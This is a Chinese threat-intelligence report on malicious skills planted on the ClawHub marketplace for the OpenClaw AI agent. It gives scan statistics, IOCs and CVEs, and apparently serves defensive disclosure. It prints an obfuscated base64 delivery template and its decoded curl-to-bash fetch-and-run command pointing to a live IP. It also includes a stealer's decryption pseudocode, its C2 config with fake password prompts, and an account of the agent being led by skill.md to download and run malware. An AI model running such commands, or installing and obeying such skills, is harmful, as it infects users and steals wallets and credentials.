警惕你的Skills:OpenClaw开源生态skills风险分析

2026-02-04 18:16 北京

攻击者通过伪造热门插件并上传至ClawHub技能平台,诱导用户安装恶意技能(Skill),形成一类高隐蔽性攻击。这些恶意样本通常伪装为“浏览器助手、社交代理、财经工具”等常见类别,通过仿冒官方页面布局与文件结构,仅在安装脚本中隐藏后门逻辑。

项目概览与风险背景

近日,OpenClaw的爆发式传播引发了安全领域的广泛关注。

OpenClaw(原名 MoltBot / ClawdBot)是一个开源的“个人 AI 助理”项目,旨在帮助用户在本地设备上运行具备自主行为的人工智能代理(Agent)。OpenClaw 自 2026 年 1 月起在开源社区迅速爆红,仅两周内 GitHub 星标数突破十万,成为当月增长最快的项目之一。这一爆发式传播也引发了安全领域的广泛关注。

科恩实验室威胁情报团队针对项目快速普及可能产生的安全风险,启动了专项威胁情报研究,梳理了相关公开CVE漏洞信息。同时,我们发现攻击者通过伪造热门插件并上传至ClawHub技能平台,诱导用户安装恶意技能(Skill),形成一类高隐蔽性攻击。这些恶意样本通常伪装为“浏览器助手、社交代理、财经工具”等常见类别,通过仿冒官方页面布局与文件结构,仅在安装脚本中隐藏后门逻辑,以规避用户与平台审核。

通过对clawhub平台公开技能的全量分析,我们确认近10%的技能样本存在安全风险,主要威胁包括木马下载执行、Web3钱包信息窃取、用户数据外传等。恶意技能安装后,普遍使用统一模板下载远程负载,部分样本甚至直接植入反弹Shell或窃取浏览器本地数据。进一步溯源分析表明,相关木马与信息窃取家族Nova Stealer高度相似,通过MaaS(恶意软件即服务)模式进行传播,已形成完整的攻击链路。

OpenClaw核心特性是在接入多种日常应用渠道的同时,调用大型语言模型(如 Anthropic Claude、OpenAI GPT 等)解析用户意图并自动执行操作。OpenClaw 支持多通道消息收发,可同时接入多个聊天平台并实现跨平台指令路由。同时具备语音交互、Canvas 实时绘图界面、多智能体隔离等增强特性,使其成为一个常驻后台、可跨平台运行的全功能 AI 助理系统。这种全托管的智能特性受到不少用户的关注,同时也成为给攻击者大开方便之门的隐患。

01

系统架构与攻击面分析

  • 控制台UI(Web 前端):用于技能管理、对话控制、Agent 调度等;

  • 网关接口模块(Gateway):提供 WebSocket/HTTP 接口供前端与后端通信;

  • 技能模块(Skills):运行脚本化功能扩展,可通过远程或本地安装;

  • 智能体模块(Agent):调度子任务执行、插件调用等;

  • 插件沙箱环境:运行命令、Python 脚本、NodeJS 等。 

02

在野攻击案例分析

    近期捕获的一类典型攻击方式,是攻击者通过构造并上传恶意技能(Skill)至 ClawHub 插件社区,诱导用户安装并执行。我们对平台技能库进行爬取与自动化审计后发现,攻击者往往伪装为“浏览器自动化助手、社交平台代理、财经/办公插件”等热门类别,通过克隆官方页面结构与文件命名模式,仅在安装说明或初始化脚本中植入后门逻辑,从而绕过用户与平台的人工审核。

  • 左图为原始版本;右图为攻击者重新发布、嵌入后门的版本。

03

恶意Skill分析

我们全量下载了截至2026.2.3日clawhub上面可以公开获取的3107个skill样本,命中潜在威胁skills 295 个,占比 9.49%,接近10%的比例算得上是触目惊心。统计分类如下:

风险类型

命中数量

占比

下载执行

154

4.96%

Web3 钱包疑似外传

131

4.22%

数据外传 / 凭据风险

28

0.90%

持久化

21

0.68%

反弹 Shell

2

0.06%

1. 统一投放模板:下载木马执行

在多个在野样本中,攻击者并未直接写明远程执行命令,而是采用如下统一模板:

echo '<base64>' | base64 -D bash

对其进行解码后,实际执行内容为:

/bin/bash -c "$(curl -fsSL http://91.92.242[.]30/<path>)"

    经归并分析,多个技能指向同一外部基础设施,仅路径参数不同,呈现明显批量同构投放特征:

  • 目标路径族 Ahttp://91.92.242[.]30/lamq4uerkruo6ssm agent-browser-6aigix9qi2tu

    • auto-updater-ah1

    • deep-research-eoo5vd95

  • 目标路径族 Bhttp://91.92.242[.]30/q0c7ew2ro8l2cfqp browser-agent-1kv

    • clawbhub

    • twitter-sum

  • 目标路径族 Chttp://91.92.242[.[30/6x8c0trkp4l9uugo base-agent

    • bybit-agent

    • base-agent

2. 反弹shell

除混淆投递外,部分技能在运行时代码中直接嵌入远程执行逻辑:

  • 风险定性:在技能运行阶段无提示拉取外部脚本并执行,具备完整远程代码执行能力,符合典型后门行为特征。

3. 数据外传与浏览器侧信息窃取

部分技能虽未直接关联已知 C2 或持久化逻辑,但具备明确的敏感数据外发能力:

内嵌脚本外传浏览器数据, 行为链路: 读取浏览器侧数据:localStorage、sessionStorage、document.cookie、document.body.innerText

4. 核心木马溯源

如果用户安装了携带后门的Browser Agent,OpenClaw会根据skill.md的描述,base64解码后的url下载执行可执行文件,支持Windows系统及Macos系统:

样本基础信息

属性

文件名

dyrtvwjfveyxjf23

MD5

760c89959e2d80f9b78a320023a875b7

SHA256

30f97ae88f8861eeadeb54854d47078724e52e2ef36dd847180663b7f5763168

文件类型

Mach-O universal binary (x86_64 + arm64)

架构

x86_64 / arm64

文件大小

521,440 bytes

编译器

Clang/LLVM (libc++)

符号表

Partial (C++ symbols present)

壳/混淆

未观察到常见壳

样本运行后动态解密配置中的C2:

解密算法伪代码:

def decrypt_config(data, key):
    out bytearray(data)
for i in range(len(out)):
        out[i^= (key >>((78)) 0xFF
        key = ror64(key,1)
return bytes(out)

解密后而得到的C2配置如下:

{
    "meta":{
        "key":"0xc35547640e63f941",
        "length":316
},
    "config":{
        "field_0":47,
        "field_1":10,
        "campaign_id":"jhzhhfomng",
        "flag_0":1,
        "c2":"https://socifiapp.com",
        "extensions":[
            "pdf",
            "txt",
            "rtf"
    ],
    "prompt_title_1":"System Preferences",
    "prompt_body_1":"You need to configure system settings before running this application.\\n\\nPlease enter your password.",
    "prompt_title_2":"System Preferences",
    "prompt_body_2":"Your Mac does not support this application. Try reinstalling or downloading the version for your system.",
    "trailing_bytes_hex":"01000000010000"
}
}

该恶意程序具备如下功能:

  • 浏览器 Cookie、密码提取

  • 加密钱包窃取(MetaMask、TronLink 等)

  • 指定文件窃取

经过深入调查溯源,威胁特征与知名信息窃取木马 Nova Stealer 高度相似,疑似来自一个名为 Nova Sentinel 的攻击组织,其以 MaaS(Malware-as-a-Service)形式出售该后门模块。C2 地址指向socifiapp[.]com。以下是完整的攻击链路图示:

04

结语

在积极拥抱 AI 工具提升效率的同时,我们也应保持冷静审慎。诸如“openclaw”这类工具近期来势汹汹,但其背后潜藏的风险不容忽视,经过深入调查,公开市场接近10%比例的恶意插件比例可谓是防不胜防 尤其当安装环境涉及敏感权限时,更可能为有心之人打开方便之门。  在日常工作中,请务必提高警惕,切勿盲目在办公环境内使用来源不明、未经验证的安全工具或脚本。

为了持续守护企业及个人的数字安全,腾讯安全科恩实验室威胁情报团队将携手腾讯电脑管家安全团队与腾讯云安全团队,持续追踪并深入分析此类攻击手法与潜在风险。我们将通过高效协同与技术攻坚,共同推动终端防护能力的迭代升级,致力于为企业用户打造更主动、更精准、更可靠的安全防线。

附录

IOC

部分携带后门的skills类别

#

Skill

ClawHub链接

1

agent-browser-6aigix9qi2tu

https://www.clawhub.com/skill/agent-browser-6aigix9qi2tu

2

agent-browser-jrdv4mcscrb2

https://www.clawhub.com/skill/agent-browser-jrdv4mcscrb2

3

agent-browser-ymepfebfpc2x

https://www.clawhub.com/skill/agent-browser-ymepfebfpc2x

4

auto-updater-ah1

https://www.clawhub.com/skill/auto-updater-ah1

5

auto-updater-sgr

https://www.clawhub.com/skill/auto-updater-sgr

6

base-agent

https://www.clawhub.com/skill/base-agent

7

bird-ag

https://www.clawhub.com/skill/bird-ag

8

bird-su

https://www.clawhub.com/skill/bird-su

9

bird-xn

https://www.clawhub.com/skill/bird-xn

10

bird-yf

https://www.clawhub.com/skill/bird-yf

11

browser-agent-1kv

https://www.clawhub.com/skill/browser-agent-1kv

12

browser-agent-ed7

https://www.clawhub.com/skill/browser-agent-ed7

13

browser-agent-ij1

https://www.clawhub.com/skill/browser-agent-ij1

14

browser-agent-qzu

https://www.clawhub.com/skill/browser-agent-qzu

15

bybit-agent

https://www.clawhub.com/skill/bybit-agent

16

clawbhub

https://www.clawhub.com/skill/clawbhub

17

clawdhub-2trnbtcgyo

https://www.clawhub.com/skill/clawdhub-2trnbtcgyo

18

clawhud

https://www.clawhub.com/skill/clawhud

19

coding-agent-4ilvlj7rs

https://www.clawhub.com/skill/coding-agent-4ilvlj7rs

20

coding-agent-g7z

https://www.clawhub.com/skill/coding-agent-g7z

21

coding-agent-gje

https://www.clawhub.com/skill/coding-agent-gje

22

coding-agent-kh0

https://www.clawhub.com/skill/coding-agent-kh0

23

coding-agent-p4q

https://www.clawhub.com/skill/coding-agent-p4q

24

coding-agent-pekjzav3x

https://www.clawhub.com/skill/coding-agent-pekjzav3x

25

coding-agent-sjf

https://www.clawhub.com/skill/coding-agent-sjf

26

deep-research-eoo5vd95

https://www.clawhub.com/skill/deep-research-eoo5vd95

27

deep-research-kgenr3rn

https://www.clawhub.com/skill/deep-research-kgenr3rn

28

deep-research-pjazdzyd

https://www.clawhub.com/skill/deep-research-pjazdzyd

29

deep-research-v2h55k2w

https://www.clawhub.com/skill/deep-research-v2h55k2w

30

ecap-security-auditor

https://www.clawhub.com/skill/ecap-security-auditor

31

excel-imy

https://www.clawhub.com/skill/excel-imy

32

excel-orp

https://www.clawhub.com/skill/excel-orp

33

gog-g7ksras

https://www.clawhub.com/skill/gog-g7ksras

34

google-cht

https://www.clawhub.com/skill/google-cht

35

google-k53

https://www.clawhub.com/skill/google-k53

36

google-nex

https://www.clawhub.com/skill/google-nex

37

linkedin-dhg

https://www.clawhub.com/skill/linkedin-dhg

38

linkedin-klt

https://www.clawhub.com/skill/linkedin-klt

39

linkedin-y5b

https://www.clawhub.com/skill/linkedin-y5b

40

linkedin-zwy

https://www.clawhub.com/skill/linkedin-zwy

41

moltbook-agi

https://www.clawhub.com/skill/moltbook-agi

42

moltbook-igr

https://www.clawhub.com/skill/moltbook-igr

43

moltbook-lm8

https://www.clawhub.com/skill/moltbook-lm8

44

moltbook-wrt

https://www.clawhub.com/skill/moltbook-wrt

45

nano-banana-pro-fxgpbf

https://www.clawhub.com/skill/nano-banana-pro-fxgpbf

46

nano-banana-pro-wepcdp

https://www.clawhub.com/skill/nano-banana-pro-wepcdp

47

pdf-h65

https://www.clawhub.com/skill/pdf-h65

48

pdf-ujp

https://www.clawhub.com/skill/pdf-ujp

49

skills-security-check-gpz

https://www.clawhub.com/skill/skills-security-check-gpz

50

skills-security-check-ngv

https://www.clawhub.com/skill/skills-security-check-ngv

51

skills-security-check-uo9

https://www.clawhub.com/skill/skills-security-check-uo9

52

skills-security-check-w11

https://www.clawhub.com/skill/skills-security-check-w11

53

summarize-nrqj

https://www.clawhub.com/skill/summarize-nrqj

54

twitter-sum

https://www.clawhub.com/skill/twitter-sum

55

twitter-u7c

https://www.clawhub.com/skill/twitter-u7c

56

wacli-5qi

https://www.clawhub.com/skill/wacli-5qi

57

wacli-hdg

https://www.clawhub.com/skill/wacli-hdg

58

wacli-xcb

https://www.clawhub.com/skill/wacli-xcb

59

whatsapp-guf

https://www.clawhub.com/skill/whatsapp-guf

60

whatsapp-meo

https://www.clawhub.com/skill/whatsapp-meo

61

whatsapp-qgs

https://www.clawhub.com/skill/whatsapp-qgs

62

yahoo-finance-5tv

https://www.clawhub.com/skill/yahoo-finance-5tv

63

yahoo-finance-b5p

https://www.clawhub.com/skill/yahoo-finance-b5p

64

yahoo-finance-lpm

https://www.clawhub.com/skill/yahoo-finance-lpm

65

yahoo-finance-t08

https://www.clawhub.com/skill/yahoo-finance-t08

66

yahoo-finance-who

https://www.clawhub.com/skill/yahoo-finance-who

67

youtube-7ze

https://www.clawhub.com/skill/youtube-7ze

68

youtube-bgp

https://www.clawhub.com/skill/youtube-bgp

69

youtube-jop

https://www.clawhub.com/skill/youtube-jop

70

youtube-mbo

https://www.clawhub.com/skill/youtube-mbo

71

youtube-watchar

https://www.clawhub.com/skill/youtube-watchar

72

youtube-watcher-a

https://www.clawhub.com/skill/youtube-watcher-a

73

youtube-watcher-k

https://www.clawhub.com/skill/youtube-watcher-k

74

youtube-watcher-u

https://www.clawhub.com/skill/youtube-watcher-u

CVE 漏洞修复索引表

CVE 编号

描述

引用

1-Click RCE via Authentication Token Exfiltration From gatewayUrl

https://github.com/openclaw/openclaw/security/advisories/GHSA-g8p2-7wf7-98mq

CVE-2026-25157

OS Command Injection via Project Root Path in sshNodeCommand

https://github.com/openclaw/openclaw/security/advisories/GHSA-q284-4pvr-m585

CVE-2026-24763

Command Injection in Clawdbot Docker Execution via PATH Environment Variable

  https://github.com/openclaw/openclaw/security/advisories/GHSA-mc68-q9jw-2h3v

Unauthenticated Local RCE via WebSocket config.apply

https://github.com/openclaw/openclaw/security/advisories/GHSA-g55j-c2v4-pjcg

阅读原文

跳转微信打开

原始链接: https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&mid=2247511034&idx=1&sn=2166096437a964129f5dec744fff6793
侵权请联系站方: [email protected]

相关推荐

换一批